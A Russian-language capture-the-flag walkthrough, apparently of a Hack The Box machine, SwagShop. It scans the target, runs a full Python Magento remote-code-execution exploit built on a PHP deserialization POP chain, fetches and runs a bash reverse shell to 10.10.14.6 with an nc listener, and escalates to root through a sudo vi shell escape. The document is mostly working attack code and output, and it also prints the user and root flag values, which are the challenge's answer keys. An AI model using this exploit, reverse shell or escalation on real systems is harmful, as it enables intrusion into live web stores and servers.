Обзор сервисов
$ nmapAutomator.sh -H 10.10.10.140 -t Full
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
| 256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_ 256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Публичный эксплоит
wget https://raw.githubusercontent.com/that-faceless-coder/magento-exploit/master/swagshop-exploit.py
Меняем swagshot.htb => 10.10.10.140
=> http://10.10.10.140/index.php/admin
Логинимся как faceless:faceless
Searchsploit magento => rce
Берем install date из http://10.10.10.140/app/etc/local.xml.
Заносим install date в эксплоит Wed, 08 May 2019 07:23:09 +0000.
Добавляем заказ, меняем статус на shipped.
После этого исполняем:
from hashlib import md5
import sys
import re
import base64
import mechanize
def usage():
print("Usage: python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\"")
sys.exit()
if len(sys.argv) != 3:
usage()
# Command-line args
target = sys.argv[1]
arg = sys.argv[2]
# Config.
username = 'faceless'
password = 'faceless'
php_function = 'system' # Note: we can only pass 1 argument to the function
install_date = 'Wed, 08 May 2019 07:23:09 +0000' #This needs to be the exact date from /app/etc/local.xml
# POP chain to pivot into call_user_exec
payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \
'\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \
'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"' \
'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00' \
'_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \
';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function,
len(arg), arg)
# Setup the mechanize browser and options
br = mechanize.Browser()
#br.set_proxies({"http": "localhost:8080"})
br.set_handle_robots(False)
request = br.open(target)
br.select_form(nr=0)
#br.form.new_control('text', 'login[username]', {'value': username}) # Had to manually add username control.
br.form.fixup()
br['login[username]'] = username
br['login[password]'] = password
br.method = "POST"
request = br.submit()
content = request.read()
url = re.search(b"ajaxBlockUrl = \'(.*)\'", content)
url = url.group(1).decode("utf-8")
key = re.search(b"var FORM_KEY = '(.*)'", content)
key = key.group(1).decode("utf-8")
request = br.open(str(url) + 'block/tab_orders/period/2y/?isAjax=true', data='isAjax=false&form_key=' + str(key))
tunnel = re.search(b"src=\"(.*)\?ga=", request.read())
tunnel = tunnel.group(1)
payload = base64.b64encode(payload.encode())
gh = md5(payload + install_date.encode()).hexdigest()
exploit = tunnel + b'?ga=' + payload + b'&h=' + gh.encode()
try:
request = br.open(exploit.decode("utf-8"))
except (mechanize.HTTPError, mechanize.URLError) as e:
print(e.read())
shell.sh:
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.14.6/1234 0>&1
Trigger:
python 37811.py http://10.10.10.140/index.php/admin/ "wget http://10.10.14.6/shell.sh"
nc -lnvp 1234
python 37811.py http://10.10.10.140/index.php/admin/ "/bin/bash shell.sh"
Флаг пользователя
www-data@swagshop:/var/www/html/app$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:1e:1c brd ff:ff:ff:ff:ff:ff
inet 10.10.10.140/24 brd 10.10.10.255 scope global ens160
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:1e1c/64 scope global mngtmpaddr dynamic
valid_lft 86187sec preferred_lft 14187sec
inet6 fe80::250:56ff:feb9:1e1c/64 scope link
valid_lft forever preferred_lft forever
www-data@swagshop:/var/www/html/app$ cat /home/haris/user.txt
a448877277e82f05e5ddf9f90aefbac8
Повышение привилегий
$ sudo -l
Matching Defaults entries for www-data on swagshop:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on swagshop:
(root) NOPASSWD: /usr/bin/vi /var/www/html/*
=> можно выполнять команду /usr/bin/vi /var/www/html/* без пароля как sudo =>
$ sudo /usr/bin/vi /var/www/html/test
> :!/bin/bash
Флаг суперпользователя
$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:1e:1c brd ff:ff:ff:ff:ff:ff
inet 10.10.10.140/24 brd 10.10.10.255 scope global ens160
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:1e1c/64 scope global mngtmpaddr dynamic
valid_lft 86022sec preferred_lft 14022sec
inet6 fe80::250:56ff:feb9:1e1c/64 scope link
valid_lft forever preferred_lft forever
$ cat root.txt
c2b087d66e14a652a3b86a130ac56721